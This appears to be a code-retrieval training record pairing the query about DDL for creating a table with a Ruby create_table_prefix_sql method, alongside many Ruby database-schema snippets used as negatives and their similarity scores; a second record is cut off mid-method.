"def initialize_schema_migrations_table\n unless table_exists?('schema_migrations')\n execute(\"CREATE TABLE schema_migrations (version string primary key INDEX using plain)\")\n end\n end",
"def initialize_schema_migrations_table\n unless table_exists?('schema_migrations')\n execute(\"CREATE TABLE schema_migrations (version string primary key INDEX using plain)\")\n end\n end",
"def create_table_from_schema(table,exec=true,schema=nil)\n\n if schema == nil\n schema = get_table_schema(table)\n if !schema\n @logger.warn(\"#{TAG} No schema exists for table #{table}\")\n return false\n end\n end\n\n query = \"create table #{table} (\\n\"\n schema[:columns].each_with_index do |(column_name,column),index|\n\n query += \"#{column_name} \" + column[:type]\n if column[:constraint] != nil\n query += \" \" + column[:constraint]\n end\n if index != schema[:columns].size - 1\n query += \",\"\n end\n query += \"\\n\"\n end\n query += \")\"\n\n # Add table attributes\n if schema[:distkey] != nil\n query += \"\\ndistkey(#{schema[:distkey]})\"\n end\n if schema[:sortkey] != nil\n query += \"\\nsortkey(#{schema[:sortkey]})\"\n end\n\n query += \";\\n\"\n\n if exec\n conn = new_redshift_connection()\n result = conn.exec(query)\n else\n result = query\n end\n\n return result\n end",
"def dump_table_schema(table, options=OPTS)\n gen = dump_table_generator(table, options)\n commands = [gen.dump_columns, gen.dump_constraints, gen.dump_indexes].reject{|x| x == ''}.join(\"\\n\\n\")\n \"create_table(#{table.inspect}#{', :ignore_index_errors=>true' if !options[:same_db] && options[:indexes] != false && !gen.indexes.empty?}) do\\n#{commands.gsub(/^/, ' ')}\\nend\"\n end",
"def create_table_sql_list(name, columns, indexes = nil, options = {})\n sql = [\"CREATE TABLE #{quote_schema_table(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def create\n @schema = Schema.new(schema_params)\n\n respond_to do |format|\n if @schema.save\n format.html { redirect_to @schema, notice: 'Schema was successfully created.' }\n format.json { render :show, status: :created, location: @schema }\n else\n format.html { render :new }\n format.json { render json: @schema.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @schema = Schema.new(schema_params)\n\n respond_to do |format|\n if @schema.save\n format.html { redirect_to @schema, notice: 'Schema was successfully created.' }\n format.json { render :show, status: :created, location: @schema }\n else\n format.html { render :new }\n format.json { render json: @schema.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update_schema\n create_table unless table_exists?\n (schema_columns - column_names).each { |column| ActiveRecord::Migration.add_column(table_name, column, :string) }\n (column_names - protected_columns - schema_columns).each { |column| ActiveRecord::Migration.remove_column(table_name, column) }\n end",
"def import_schemata!\n output 'Dropping and re-creating table definitions'\n result = mysql_root_cmd \"source #{Jetpants.export_location}/create_tables_#{@port}.sql\", terminator: '', schema: true\n output result\n end",
"def import_schemata!\n output 'Dropping and re-creating table definitions'\n result = mysql_root_cmd \"source #{Jetpants.export_location}/create_tables_#{@port}.sql\", terminator: '', schema: true\n output result\n end",
"def create_table(klass)\n fields = fields_for_class(klass)\n\n sql = \"CREATE TABLE #{klass.table} (#{fields.join(', ')}\"\n\n # Create table constraints.\n\n if constraints = klass.ann(:self, :sql_constraint)\n sql << \", #{constraints.join(', ')}\"\n end\n\n # Set the table type (Mysql default, InnoDB, Hash, etc)\n\n if table_type = @options[:table_type]\n sql << \") TYPE = #{table_type};\"\n else\n sql << \")\"\n end\n\n begin\n exec(sql, false)\n info \"Created table #{klass.table}.\"\n rescue Object => ex\n if table_already_exists_exception? ex\n # Don't return yet. Fall trough to also check for the\n # join table.\n else\n handle_sql_exception(ex, sql)\n end\n end\n end",
"def create_type_of_book(db)\r\n create_type_of_book_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS type_of_book(\r\n type_id INTEGER PRIMARY KEY,\r\n type_name VARCHAR(255)\r\n )\r\n SQL\r\n #create type_of_book table\r\n db.execute(create_type_of_book_cmd)\r\nend",
"def create\n @schema_table = SchemaTable.new(schema_table_params)\n\n respond_to do |format|\n if @schema_table.save\n format.html { redirect_to @schema_table, notice: 'Schema table was successfully created.' }\n format.json { render :show, status: :created, location: @schema_table }\n else\n format.html { render :new }\n format.json { render json: @schema_table.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @schema = Schema.new(params[:schema])\n\n respond_to do |format|\n if @schema.save\n format.html { redirect_to @schema, notice: 'Schema was successfully created.' }\n format.json { render json: @schema, status: :created, location: @schema }\n else\n format.html { render action: \"new\" }\n format.json { render json: @schema.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_table_prefix_sql(name, options)\n prefix_sql = if options[:temp]\n raise(Error, \"can't provide both :temp and :unlogged to create_table\") if options[:unlogged]\n raise(Error, \"can't provide both :temp and :foreign to create_table\") if options[:foreign]\n temporary_table_sql\n elsif options[:foreign]\n raise(Error, \"can't provide both :foreign and :unlogged to create_table\") if options[:unlogged]\n 'FOREIGN '\n elsif options[:unlogged]\n 'UNLOGGED '\n end\n\n \"CREATE #{prefix_sql}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}\"\n end",
"def property_schema_statement(schema)\n statement = super\n statement << ' AUTO_INCREMENT' if supports_serial? && schema[:serial?]\n statement\n end",
"def create_table_as(name, sql, options)\n sql = sql.sql if sql.is_a?(Sequel::Dataset)\n run(create_table_as_sql(name, sql, options))\n end",
"def to_create_database_sql(db)\n db.send(:create_database_sql, self.name, {})\n end",
"def schema_generator_script(schema_name, mode = 'create', owner: DefaultSchemaOwner)\n cname = \"#{mode}_#{schema_name}_schema_#{migration_version}\".camelize\n\n <<~CONTENT\n require 'active_record/migration/app_generator'\n class #{cname} < ActiveRecord::Migration[5.2]\n include ActiveRecord::Migration::AppGenerator\n\n def change\n self.schema = '#{schema_name}'\n self.owner = '#{owner}'\n create_schema\n end\n end\n CONTENT\n end",
"def create_table_sql(name, generator, options)\n \"#{super}#{create_table_suffix_sql(name, options)}\"\n end",
"def create_table_statement(table_name, table)\n normalize_primary_key(table)\n add_line \"create_table #{table_name.inspect}#{pretty_hash(table[:table_options])} do\"\n indent do\n output_columns(table[:columns], table[:primary_key])\n output_indexes(table[:indexes])\n output_primary_key(table)\n end\n add_line \"end\"\n end",
"def create_publication(name, all_tables = false, tables = [], options = {})\n base_command = \"CREATE PUBLICATION #{connection.quote_ident(name)}\"\n if all_tables\n base_command << \" FOR ALL TABLES\"\n elsif !tables.empty?\n base_command << \" FOR TABLE #{safe_list(tables)}\"\n end\n typed_exec(@command_builder.command_with_options(base_command, \"WITH\", options))\n end",
"def create\n @schema = Schema.new(params[:schema])\n\n respond_to do |format|\n if @schema.save\n format.html { redirect_to @schema, :notice => 'Schema was successfully created.' }\n format.json { render :json => @schema, :status => :created, :location => @schema }\n else\n format.html { render :action => \"new\" }\n format.json { render :json => @schema.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def drop_and_create_schema_migrations_table\n sql = [\n \"USE #{@database}\",\n 'DROP TABLE IF EXISTS schema_migrations',\n 'CREATE TABLE schema_migrations ( version varchar(255) COLLATE utf8_unicode_ci NOT NULL, UNIQUE KEY unique_schema_migrations (version)) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci'\n ]\n\n run_commands(sql)\n end",
"def createUserTable\n @conn.exec(\"CREATEE users (id serial NOT NULL, name character varying(255), CONSTRAINT users_pkey PRIMARY KEY (id)) WITH (OIDS=FALSE);\");\n end",
"def set_schema(name = nil, &block)\n set_dataset(db[name]) if name\n @schema = db.create_table_generator(&block)\n set_primary_key(@schema.primary_key_name) if @schema.primary_key_name\n end",
"def drop_schema_sql(name, opts=OPTS)\n \"DROP SCHEMA#{' IF EXISTS' if opts[:if_exists]} #{quote_identifier(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def create_schema\n schema = @index.schema\n unless schema.tables['search']\n @index.execute_batch <<-SQL\n CREATE VIRTUAL TABLE search USING fts5(\n sequence_number,\n kanji,\n kana,\n senses\n );\n SQL\n @index.reload_schema!\n end\n end",
"def create\n if @db.table_info(METADATA_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{METADATA_TABLE_NAME} (key VARCHAR(1024), val VARCHAR(8192), env VARCHAR(255))\"\n @db.execute(stmt)\n end\n\n if @db.table_info(RUN_HISTORY_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{RUN_HISTORY_TABLE_NAME} (name VARCHAR(1024), outcome VARCHAR(16), env VARCHAR(255), time DATETIME)\"\n @db.execute(stmt)\n\n index_stmt = \"CREATE INDEX index_run_history ON #{RUN_HISTORY_TABLE_NAME} (time DESC)\"\n @db.execute(index_stmt)\n end\n\n if @db.table_info(DISABLED_MONITOR_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{DISABLED_MONITOR_TABLE_NAME} (name VARCHAR(1024), env VARCHAR(255))\"\n @db.execute(stmt)\n end\n\n if @db.table_info(MONITOR_INFO_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{MONITOR_INFO_TABLE_NAME} (name VARCHAR(1024), description VARCHAR(8192))\"\n @db.execute(stmt)\n end\n end",
"def create_table (table_name)\r\n\t\"CREATE TABLE IF NOT EXISTS \" + table_name + \r\n\t\"(\r\n\tid INTEGER PRIMARY KEY,\r\n\ttitle VARCHAR(255),\r\n\tcode VARCHAR(255)\r\n\t)\"\r\nend",
"def tnTableCreation(tableName)\n pk_list = @pkList.join(',')\n pk_list = \"#{pk_list},branch_name,node_name\"\n q = QueryBuilder.create_tbl(tableName, pk_list, \"select #{@pkSelect}, 0 as test_id,''::varchar(30) as node_name, ''::varchar(30) as branch_name, ''::varchar(5) as type from #{@fTable} f where 1 = 0\")\n # pp q\n DBConn.exec(q)\n\n # q=\"ALTER TABLE #{tableName} add column test_id int, add column node_name varchar(30), add column branch_name varchar(30), add column type varchar(5);\"\n # DBConn.exec(q)\n # pk=@pkList.join(',')\n # # add index\n # q=\"create index ix_#{tableName}t on #{tableName} (#{pk},branch_name);\"\n # pp q\n # DBConn.exec(q)\n end",
"def create_products_table\n c = PGconn.new(:host => \"localhost\", :dbname => dbname)\n c.exec %q{\n CREATE TABLE products (\n id SERIAL PRIMARY KEY,\n name varchar(255),\n price decimal,\n description text\n );\n }\n c.close\nend",
"def create_table_sql_list(name, columns, indexes = nil)\n sql = [\"CREATE TABLE #{quote_identifier(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def create_table_sql(name, generator, options)\n unless supports_named_column_constraints?\n # Split column constraints into table constraints if they have a name\n generator.columns.each do |c|\n if (constraint_name = c.delete(:foreign_key_constraint_name)) && (table = c.delete(:table))\n opts = {}\n opts[:name] = constraint_name\n [:key, :on_delete, :on_update, :deferrable].each{|k| opts[k] = c[k]}\n generator.foreign_key([c[:name]], table, opts)\n end\n if (constraint_name = c.delete(:unique_constraint_name)) && c.delete(:unique)\n generator.unique(c[:name], :name=>constraint_name)\n end\n if (constraint_name = c.delete(:primary_key_constraint_name)) && c.delete(:primary_key)\n generator.primary_key([c[:name]], :name=>constraint_name)\n end\n end\n end\n\n unless can_add_primary_key_constraint_on_nullable_columns?\n if pk = generator.constraints.find{|op| op[:type] == :primary_key}\n pk[:columns].each do |column|\n if matched_column = generator.columns.find{|gc| gc[:name] == column}\n matched_column[:null] = false\n end\n end\n end\n end\n\n \"#{create_table_prefix_sql(name, options)} (#{column_list_sql(generator)})\"\n end",
"def create_table\n ActiveRecord::Migration.create_table(table_name) do |t|;end;\n end",
"def schema_definition\n of.schema_definition \n end",
"def create_table_suffix_sql(name, options)\n sql = String.new\n\n if inherits = options[:inherits]\n sql << \" INHERITS (#{Array(inherits).map{|t| quote_schema_table(t)}.join(', ')})\"\n end\n\n if partition_by = options[:partition_by]\n sql << \" PARTITION BY #{options[:partition_type]||'RANGE'} #{literal(Array(partition_by))}\"\n end\n\n if on_commit = options[:on_commit]\n raise(Error, \"can't provide :on_commit without :temp to create_table\") unless options[:temp]\n raise(Error, \"unsupported on_commit option: #{on_commit.inspect}\") unless ON_COMMIT.has_key?(on_commit)\n sql << \" ON COMMIT #{ON_COMMIT[on_commit]}\"\n end\n\n if tablespace = options[:tablespace]\n sql << \" TABLESPACE #{quote_identifier(tablespace)}\"\n end\n\n if server = options[:foreign]\n sql << \" SERVER #{quote_identifier(server)}\"\n if foreign_opts = options[:options]\n sql << \" OPTIONS (#{foreign_opts.map{|k, v| \"#{k} #{literal(v.to_s)}\"}.join(', ')})\"\n end\n end\n\n sql\n end",
"def set_schema(schema)\n @current_schema = nil\n execute \"SET SCHEMA #{schema}\", 'SCHEMA'\n end",
"def create_table_sql(name, generator, options)\n a, b = super(name, generator, options), table_options_sql(options)\n \"#{a}\\n#{b}\"\n\t end",
"def show_create_table(db, table)\n end",
"def create_database(name, options = {})\n options = options.reverse_merge(encoding: 'utf8')\n\n option_string = options.symbolize_keys.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n ''\n end\n end\n\n execute(\"CREATE DATABASE #{quote_table_name(name)}#{option_string}\")\n end",
"def createTaskTable\n @Handle.execute( @TaskSchema ) \n end",
"def create_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"test\")\n c.exec %q{\n CREATE TABLE movies (\n id PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def dump_table_schema(table, options={})\n table = table.value.to_s if table.is_a?(SQL::Identifier)\n raise(Error, \"must provide table as a Symbol, String, or Sequel::SQL::Identifier\") unless [String, Symbol].any?{|c| table.is_a?(c)}\n s = schema(table).dup\n pks = s.find_all{|x| x.last[:primary_key] == true}.map{|x| x.first}\n options = options.merge(:single_pk=>true) if pks.length == 1\n m = method(:column_schema_to_generator_opts)\n im = method(:index_to_generator_opts)\n begin\n indexes = indexes(table).sort_by{|k,v| k.to_s} if options[:indexes] != false\n rescue Sequel::NotImplemented\n nil\n end\n gen = Schema::Generator.new(self) do\n s.each{|name, info| send(*m.call(name, info, options))}\n primary_key(pks) if !@primary_key && pks.length > 0\n indexes.each{|iname, iopts| send(:index, iopts[:columns], im.call(table, iname, iopts))} if indexes\n end\n commands = [gen.dump_columns, gen.dump_constraints, gen.dump_indexes].reject{|x| x == ''}.join(\"\\n\\n\")\n \"create_table(#{table.inspect}#{', :ignore_index_errors=>true' if !options[:same_db] && options[:indexes] != false && indexes && !indexes.empty?}) do\\n#{commands.gsub(/^/o, ' ')}\\nend\"\n end",
"def create!(con)\n con.exec create_stmt\n end",
"def __create_meta_data_table_for schema\n ActiveRecord::Base.establish_connection(self.connection_data) unless schema.connected?\n\n # Clears the table cache for the schema (remove TableDoesNotExists if a table actually exists)\n schema.clear_cache!\n\n unless schema.table_exists?\n ActiveRecord::Schema.define do\n create_table schema.table_name do |t|\n t.column :version, :float\n end\n end\n end\n end",
"def generate_query\n unless databases.nil?\n databases.each do |db|\n create_query[db] = [\"create table #{tablename} (\"]\n end\n csv_column_datatypes.each do |header, datatype|\n append_to_query = build_query_for_datatype(header, datatype)\n append_to_query.each do |key, value|\n create_query[key].push(value)\n end\n end\n prepare_sql_statements\n prepare_import_csv\n # Pass the prepared statements to options varaible.\n # Which gets passed on to print_metadata_analysis\n options[:create_query] = create_query\n options[:import_query] = import_query\n end\n print_metadata_analysis\n end",
"def create_table(table_name)\n # translate into pinyin, then to symbol\n table = trans_pinyin(table_name).to_sym\n DB.create_table table do\n primary_key :id\n String :mid, :unique=>true\n DateTime :created_timestamp\n String :content, :text => true\n String :source\n String :user_id\n String :user_name\n String :user_gender\n Integer :user_status_count\n Integer :user_fansNum\n end\n return table\nend",
"def create_tables!\n migrate(:up)\n end"
] |
[
"0.8491162",
"0.8416065",
"0.8397193",
"0.8367142",
"0.8297997",
"0.7959022",
"0.7633281",
"0.7361771",
"0.7265676",
"0.725682",
"0.7212021",
"0.7210765",
"0.7127146",
"0.7030964",
"0.69537985",
"0.6888085",
"0.6867996",
"0.6858188",
"0.685559",
"0.6830588",
"0.6817735",
"0.6797758",
"0.67968524",
"0.67225933",
"0.6686438",
"0.6642827",
"0.66419667",
"0.65857965",
"0.6584558",
"0.6501493",
"0.6500645",
"0.6477445",
"0.646444",
"0.64482164",
"0.6446704",
"0.6440753",
"0.6440637",
"0.64377683",
"0.6435648",
"0.64046454",
"0.63613504",
"0.63470525",
"0.6335003",
"0.63319755",
"0.63153446",
"0.631337",
"0.63127524",
"0.631133",
"0.6302986",
"0.62993383",
"0.6289113",
"0.6289113",
"0.6289113",
"0.6256081",
"0.6253094",
"0.6246127",
"0.6236883",
"0.6236883",
"0.6233763",
"0.62110007",
"0.62110007",
"0.6206255",
"0.62044984",
"0.619378",
"0.6180945",
"0.6178015",
"0.6177059",
"0.6171303",
"0.61710143",
"0.6149872",
"0.6146691",
"0.614491",
"0.614347",
"0.6139659",
"0.6124996",
"0.61219895",
"0.61207813",
"0.61083233",
"0.61018544",
"0.60952175",
"0.6094614",
"0.6093026",
"0.6091505",
"0.6074933",
"0.6050737",
"0.60413015",
"0.6037047",
"0.6036439",
"0.6036288",
"0.6022185",
"0.60186064",
"0.6016578",
"0.6010991",
"0.6010407",
"0.59827507",
"0.5982061",
"0.5981747",
"0.597863",
"0.5977552",
"0.59725153"
] |
0.81587696
|
5
|
DDL statement for creating a table with the given name, columns, and options
|
def create_table_prefix_sql(name, options)
prefix_sql = if options[:temp]
raise(Error, "can't provide both :temp and :unlogged to create_table") if options[:unlogged]
raise(Error, "can't provide both :temp and :foreign to create_table") if options[:foreign]
temporary_table_sql
elsif options[:foreign]
raise(Error, "can't provide both :foreign and :unlogged to create_table") if options[:unlogged]
'FOREIGN '
elsif options[:unlogged]
'UNLOGGED '
end
"CREATE #{prefix_sql}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}"
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_table_sql_list(name, columns, indexes = nil, options = {})\n sql = [\"CREATE TABLE #{quote_schema_table(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def create_table_sql_list(name, columns, indexes = nil)\n sql = [\"CREATE TABLE #{quote_identifier(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def create_table_sql_list(name, columns, indexes = nil)\n sql = [\"CREATE TABLE #{quote_schema_table(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def create_table(create_table_options = {})\n self.connection.create_table(table_name, create_table_options) do |t|\n t.column :undone, :boolean, :default => false, :null => false\n t.column :description, :string\n t.column :updated_at, :timestamp\n end\n end",
"def create_table_statement(table_name, table)\n normalize_primary_key(table)\n add_line \"create_table #{table_name.inspect}#{pretty_hash(table[:table_options])} do\"\n indent do\n output_columns(table[:columns], table[:primary_key])\n output_indexes(table[:indexes])\n output_primary_key(table)\n end\n add_line \"end\"\n end",
"def create\n\t\tsql = \"CREATE TABLE `#{@table}` (\"\n\t\t@columns.each do |column|\n\t\t\tsql += \"`#{column[:name]}` #{column[:type]}\"\n\t\t\tif(column[:not_null])\n\t\t\t\tsql += ' NOT NULL'\n\t\t\tend\n\n\t\t\tif(column[:primary_key])\n\t\t\t\tsql += ' PRIMARY KEY'\n\t\t\tend\n\n\t\t\tif(column[:auto_increment])\n\t\t\t\tsql += ' AUTOINCREMENT'\n\t\t\tend\n\n\t\t\tif(column[:unique])\n\t\t\t\tsql += ' UNIQUE'\n\t\t\tend\n\t\t\tsql += ','\n\t\tend\n\t\tsql.chop! # Remove trailing ','\n\t\tsql += ');'\n\t\tp sql\n\t\t@db.execute(sql)\n\tend",
"def create_table_sql(name, generator, options)\n a, b = super(name, generator, options), table_options_sql(options)\n \"#{a}\\n#{b}\"\n\t end",
"def create_table_from_generator(name, generator, options)\n execute_ddl(create_table_sql(name, generator, options))\n end",
"def create_table_sql(name, generator, options)\n unless supports_named_column_constraints?\n # Split column constraints into table constraints if they have a name\n generator.columns.each do |c|\n if (constraint_name = c.delete(:foreign_key_constraint_name)) && (table = c.delete(:table))\n opts = {}\n opts[:name] = constraint_name\n [:key, :on_delete, :on_update, :deferrable].each{|k| opts[k] = c[k]}\n generator.foreign_key([c[:name]], table, opts)\n end\n if (constraint_name = c.delete(:unique_constraint_name)) && c.delete(:unique)\n generator.unique(c[:name], :name=>constraint_name)\n end\n if (constraint_name = c.delete(:primary_key_constraint_name)) && c.delete(:primary_key)\n generator.primary_key([c[:name]], :name=>constraint_name)\n end\n end\n end\n\n unless can_add_primary_key_constraint_on_nullable_columns?\n if pk = generator.constraints.find{|op| op[:type] == :primary_key}\n pk[:columns].each do |column|\n if matched_column = generator.columns.find{|gc| gc[:name] == column}\n matched_column[:null] = false\n end\n end\n end\n end\n\n \"#{create_table_prefix_sql(name, options)} (#{column_list_sql(generator)})\"\n end",
"def create_table_from_generator(name, generator, options)\n drop_statement, create_statements = create_table_sql_list(name, generator, options)\n (execute_ddl(drop_statement) rescue nil) if drop_statement\n create_statements.each{|sql| execute_ddl(sql)}\n end",
"def create_table_sql(name, generator, options)\n \"#{super}#{create_table_suffix_sql(name, options)}\"\n end",
"def create_table_as_sql(name, sql, options)\n \"#{create_table_prefix_sql(name, options)} AS (#{sql}) WITH DATA\"\n end",
"def create_table_as_sql(name, sql, options)\n \"#{create_table_prefix_sql(name, options)} AS #{sql}\"\n end",
"def create_table(name, &block)\n DB.drop_table? name if @opts.drop_tables?\n DB.create_table? name.to_sym, &block\n info \"Setup database table: #{name}\"\n end",
"def create_table_suffix_sql(name, options)\n sql = String.new\n\n if inherits = options[:inherits]\n sql << \" INHERITS (#{Array(inherits).map{|t| quote_schema_table(t)}.join(', ')})\"\n end\n\n if partition_by = options[:partition_by]\n sql << \" PARTITION BY #{options[:partition_type]||'RANGE'} #{literal(Array(partition_by))}\"\n end\n\n if on_commit = options[:on_commit]\n raise(Error, \"can't provide :on_commit without :temp to create_table\") unless options[:temp]\n raise(Error, \"unsupported on_commit option: #{on_commit.inspect}\") unless ON_COMMIT.has_key?(on_commit)\n sql << \" ON COMMIT #{ON_COMMIT[on_commit]}\"\n end\n\n if tablespace = options[:tablespace]\n sql << \" TABLESPACE #{quote_identifier(tablespace)}\"\n end\n\n if server = options[:foreign]\n sql << \" SERVER #{quote_identifier(server)}\"\n if foreign_opts = options[:options]\n sql << \" OPTIONS (#{foreign_opts.map{|k, v| \"#{k} #{literal(v.to_s)}\"}.join(', ')})\"\n end\n end\n\n sql\n end",
"def define_table(table_name, columns, force)\n if !db_connection.table_exists?(table_name) || force\n db_connection.create_table(table_name, force: true) do |t|\n columns.each do |name, type|\n t.send(type, name)\n end\n end\n end\n end",
"def create_table(table_name, column_definition = {})\n cols = column_definition.to_a.map { |a| a.join(' ') }.join(', ')\n stmt = %{CREATE TABLE \"#{table_name}\" (#{cols})}\n execute(stmt)\n end",
"def sql_create_table primary_key=nil, drop_first=nil, table_options=''\n str = []\n str << %Q{DROP TABLE IF EXISTS `#{self.table_name}`; } if drop_first\n str << %Q{CREATE TABLE `#{self.table_name}` ( }\n str << self.to_sql\n if primary_key then str.last << ',' ; str << %Q{ PRIMARY KEY \\t(`#{primary_key}`)} ; end\n str << %Q{ ) #{table_options} ;}\n str.join(\"\\n\")\n end",
"def create_table_as(name, sql, options)\n sql = sql.sql if sql.is_a?(Sequel::Dataset)\n run(create_table_as_sql(name, sql, options))\n end",
"def create_table_prefix_sql(name, options)\n \"CREATE #{temporary_table_sql if options[:temp]}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}\"\n end",
"def create_table(name, &block)\n g = Schema::Generator.new(self, &block)\n create_table_sql_list(name, *g.create_info).each {|sql| execute(sql)}\n end",
"def define_table(table_name, columns, force)\n if !ActiveRecord::Base.connection.table_exists?(table_name) || force\n ActiveRecord::Base.connection.create_table(table_name, force: true) do |t|\n columns.each do |name, type|\n t.send(type, name)\n end\n end\n end\n end",
"def create_table( table_name, options = {}, &block )\n super( table_name, options, &block )\n @connection.schema.load_table( table_name.to_s )\n end",
"def create_table(*args, &block)\n db.create_table(name,*args, &block)\n end",
"def tnTableCreation(tableName)\n pk_list = @pkList.join(',')\n pk_list = \"#{pk_list},branch_name,node_name\"\n q = QueryBuilder.create_tbl(tableName, pk_list, \"select #{@pkSelect}, 0 as test_id,''::varchar(30) as node_name, ''::varchar(30) as branch_name, ''::varchar(5) as type from #{@fTable} f where 1 = 0\")\n # pp q\n DBConn.exec(q)\n\n # q=\"ALTER TABLE #{tableName} add column test_id int, add column node_name varchar(30), add column branch_name varchar(30), add column type varchar(5);\"\n # DBConn.exec(q)\n # pk=@pkList.join(',')\n # # add index\n # q=\"create index ix_#{tableName}t on #{tableName} (#{pk},branch_name);\"\n # pp q\n # DBConn.exec(q)\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create_table!(*args, &block)\n drop_table(model.table_name)\n create_table(*args, &block)\n end",
"def create_table\n ActiveRecord::Migration.create_table(table_name) do |t|;end;\n end",
"def create_table(table, options={})\n return send_message(SkyDB::Message::CreateTable.new(table, options))\n end",
"def create_mysql_table name, columns\n sql = \"CREATE TABLE IF NOT EXISTS `#{name.strip}` (\"\n\n for column in columns.split(',')\n sql << \"`#{column.strip}` VARCHAR(500),\"\n end\n\n sql.gsub!(/,$/, '')\n sql << ')'\n\n ActiveRecord::Base.connection.execute(sql)\nend",
"def create_table!(*args, &block)\n drop_table?\n create_table(*args, &block)\n end",
"def create_table(*params)\n connection.create_table(*params) {}\n end",
"def create_table (table_name)\r\n\t\"CREATE TABLE IF NOT EXISTS \" + table_name + \r\n\t\"(\r\n\tid INTEGER PRIMARY KEY,\r\n\ttitle VARCHAR(255),\r\n\tcode VARCHAR(255)\r\n\t)\"\r\nend",
"def create_table(output, db, table)\n cols = query(db, \"DESCRIBE #{table}\")\n \n output << \"CREATE TABLE #{table} (\\n\"\n cols.each_with_index do |c, i|\n output << \",\\n\" if i > 0\n output << \"\\t#{c[0]} #{c[1]}\"\n output << \" primary key\" if c[3] == \"PRI\"\n output << \" DEFAULT NULL\" if c[2] == \"YES\"\n output << \" DEFAULT #{c[4]}\" if c[2] == \"NO\" && c[3] != \"PRI\"\n output << \" #{c[5]}\" if c[5] != \"\"\n end\n output << \"\\n);\\n\\n\"\n\n return cols\n end",
"def create_table(table)\n db_client.query(\"SHOW CREATE TABLE #{table['name']}\").first['Create Table'] + ';'\n end",
"def show_create_table(db, table)\n end",
"def create_table\n puts \"Creating table >> PEOPLE\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def dump_table_schema(table, options=OPTS)\n gen = dump_table_generator(table, options)\n commands = [gen.dump_columns, gen.dump_constraints, gen.dump_indexes].reject{|x| x == ''}.join(\"\\n\\n\")\n \"create_table(#{table.inspect}#{', :ignore_index_errors=>true' if !options[:same_db] && options[:indexes] != false && !gen.indexes.empty?}) do\\n#{commands.gsub(/^/, ' ')}\\nend\"\n end",
"def drop_table_sql(name, options)\n \"DROP TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def create_table(name, options=OPTS, &block)\n if options[:partition_of]\n create_partition_of_table_from_generator(name, CreatePartitionOfTableGenerator.new(&block), options)\n return\n end\n\n super\n end",
"def create_table(*args, &block)\n apply_translatable_option!(:create_table, block, *args) do |definition|\n super(*args, &definition)\n end\n end",
"def create_table(table, **kwargs, &block)\n current_instructions << Instructions::CreateTable.new(\n **kwargs,\n table: table,\n columns_block: block,\n )\n end",
"def create_table\n puts \"Creating people table\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def create_table!(name, &block)\n drop_table(name) rescue nil\n create_table(name, &block)\n end",
"def generate(options)\n title = options[:title]\n # leader_names = options[:leader_names]\n column_names = options[:column_names]\n # headings = options[:headings]\n # follower_names = options[:follower_names]\n # headings = options[:headings]\n filename = options[:sql][:filename]\n # header = options[:sql][:header]\n\n @transforms = options[:transforms]\n @converter = options[:converter]\n\n\n max_size = -1\n column_names.each { |cn| max_size = cn.size if cn.size > max_size }\n\n sql_file = File.open(filename.to_s, 'w')\n\n sql_file.puts <<~EOS\n -- ==============================================================\n -- == File: #{filename}\n\n DROP TABLE IF EXISTS #{title.variablize('snake_case')};\n\n CREATE TABLE \"public\".\"#{title.variablize('snake_case')}\" (\n EOS\n\n if add_column? :id\n sql_file.puts %Q[ \"id\" INTEGER DEFAULT nextval('#{title.variablize('snake_case')}_id_seq'::regclass) NOT NULL UNIQUE,]\n end\n\n if add_column? :unique_id\n sql_file.puts %Q[ \"unique_id\" CHARACTER VARYING( 255 ) COLLATE \"pg_catalog\".\"default\",]\n end\n\n sql_file.puts '--'\n column_names.each do |col_name|\n spaces = \" \" * (max_size - col_name.size + 2)\n sql_file.print %Q' \"#{col_name}\" ' + spaces + get_type(col_name)\n # SMELL: must we always mod the source when new additional columns are added after spreadsheet?\n # 